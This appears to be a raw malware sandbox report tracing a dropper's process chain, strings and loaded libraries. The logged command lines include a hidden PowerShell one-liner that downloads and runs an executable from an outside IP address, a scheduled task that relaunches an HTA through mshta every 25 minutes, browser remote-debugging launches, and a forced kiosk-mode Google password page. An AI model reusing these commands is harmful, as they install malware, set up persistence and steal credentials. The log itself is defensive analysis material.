CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 0f39a8c7db.exe, 00000008.00000002.2521791013.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0f39a8c7db.exe, 00000008.00000002.2489551392.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 0xqfQZufeQ.exe	Virustotal: Detection: 51%
Source: 0xqfQZufeQ.exe	ReversingLabs: Detection: 55%

Source: 0xqfQZufeQ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0f39a8c7db.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

File read: C:\Users\user\Desktop\0xqfQZufeQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0xqfQZufeQ.exe "C:\Users\user\Desktop\0xqfQZufeQ.exe"
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe"
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=2080,i,8469522446261978665,9122327943135786240,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe "C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe"
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe "C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe"
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=2016,i,4419702556326293557,15812454989437245169,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=1968,i,3903610469523222720,1416506910416547773,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe "C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe "C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe "C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe"
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe"
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe"
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe "C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe "C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe "C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=2080,i,8469522446261978665,9122327943135786240,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe "C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe "C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe "C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe "C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=2016,i,4419702556326293557,15812454989437245169,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=1968,i,3903610469523222720,1416506910416547773,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winmm.dll	Jump to behavior
